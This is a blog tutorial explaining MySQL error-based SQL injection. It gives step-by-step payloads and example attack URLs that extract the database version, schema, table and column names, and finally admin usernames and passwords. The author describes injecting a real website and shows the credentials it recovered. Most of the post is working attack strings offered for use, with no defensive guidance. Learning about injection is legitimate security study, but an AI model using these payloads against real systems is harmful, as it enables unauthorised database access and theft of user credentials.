MySQL Error Based Injection Explained

 

We have already covered on Basics of SQL Injections with UNION Technique.
You can check my POST here http://www.madleets.com/Thread-sql-injection-explained
but if this thing does not work, its time to think outside the box.

In this article, I am writing on Error Based Injections.

What is Error Based Injection?

In Error based injection, attacker send queries to database that force database to throw errors in result i,e Invalid SQL statments are sent over to database via HTTP requests. We generate error messages and try to fetch some useful data
from the database with these errors.


When we should try Error Based injections?
there are several cases when regular UNION techniques fails and you need to find other way to exploit the vulnerability.
like you try order by or group by statements to find the correct column count in first select statement but when you union your second
statement with it, it does not give our Required output. E.G it gives error like

Select statement have different columns in Query
or
Unknown Column 1
etc.
In such scenarios, Error Based Injection is way to Go!.



Exploitation using Error Based Injections.



  • We will be extracting MySQL Version Information.
  • We will be Extracting Database Names in our Target Application.
  • We will be Getting Table_Names in a particular Database.
  • We will be extracting Column_names of any table in any Database.
  • And We will be Extracting Entries from Columns then.


Extracting Version() with Error Based Injection

To extract version info use following query.
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1#

Real time Example:

http://website.com/search-res.php?id=70'+or+1+group+by+concat_ws+(0x3a,version(),floor (rand(0)*2))+having min(0)+or+1#




You can clearly see the error message in upper picture, it says
Duplicate entry '5.1.73-cll:1' for key 'group_key'
In this Error Message, 5.1.73-cll is our required data. Forget the Rest of Error.

NOTE:  In My Target, Vulnerable parameter takes string so I put '  single quote to end string and # at the end to comment out rest of the query.


Extracting Database() name with Error Based Injection



to extract database() name, use following query

or+1+group+by+concat_ws+(0x3a,database(),floor (rand(0)*2))+having min(0)+or+1#
Real time Example:

http://website.com/search-res.php?id=70'+or+1+group+by+concat_ws+(0x3a,database(),floor (rand(0)*2))+having min(0)+or+1#


How to find other databases name if exist other than current database?



Well you can use this syntax:

or 1 group by  concat_ws(0x3a,(select concat(schema_name) from information_schema.schemata limit 1,1),floor(rand(0)*2)) having min(0) or 1#


and go on increasing limit number by 1 to find next database name.

Real time Example:

http://www.website.com/dir/committees.php?id=-40 or 1 group by  concat_ws(0x3a,(select concat(schema_name) from information_schema.schemata limit 1,1),floor(rand(0)*2)) having min(0) or 1#


Finding Table names using Error based Injection

To extract first table from current database 

or 1 group by  concat_ws(
0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)
) having min(0) or 1#


NOTE: To extract table names from other databases, replace database() with quoted or hexed value of other Database name.

Real time example

http://www.website.com/dir/committees.php?id=-40 or 1 group by concat_ws(
0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)
) having min(0) or 1#



Finding Column names using Error Based Injection

To find column names in any table, use this syntax
lets say our table_name is admin users and we want to find the first column_name of table admin_user
our syntax would be:

 1 group by  concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 0,1),floor(rand(0)*2)) having min(0) or 1#

The text in  blue 0x61646d696e5f75736572  is the hexed value of admin_user. and text in red limit 0,1 shows that we are trying to extract the first column_name of this table. For the next column we simply increase the limit to 1,1
Example:
1 group by  concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 1,1),floor(rand(0)*2)) having min(0) or 1#

Real Time Example:

http://website.com/dir/committees.php?id=-40 or 1 group by concat_ws(0x3a,(select concat(column_name) from information_schema.columns where table_name=0x61646d696e5f75736572 limit 3,1),floor(rand(0)*2)) having min(0) or 1#
You can see username:1 in the error, that is our required output. username is the column name we were looking for.
I have injected the website, and I found password on 5th position in table.
anyway, we have table names and their column names now.

How to Extract Entries from database using Error Based Injection?

Okay, 
we know table names and their column names, Now all we have to do is, Extract these columns name Entries from Tables.
We have columns username and password in table admin_user, so to extract there entries our syntax would be:

or 1 group by  concat_ws(0x3a,(select concat(username,0x3a3a,password) from admin_user limit 0,1),floor(rand(0)*2)) having min(0) or 1#

Real time example:

http://www.website.com/dir/committees.php?id=-40 or 1 group by  concat_ws(0x3a,(select concat(username,0x3a3a,password) from admin_user limit 0,1),floor(rand(0)*2)) having min(0) or 1#






You can see admin:admin123;1 in result
admin is username and admin123 is password.

I hope you guys now have idea, how things works in Error Based Injection.Kindly give us your valuable feedback so that we come again with more more HQ articles 

Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment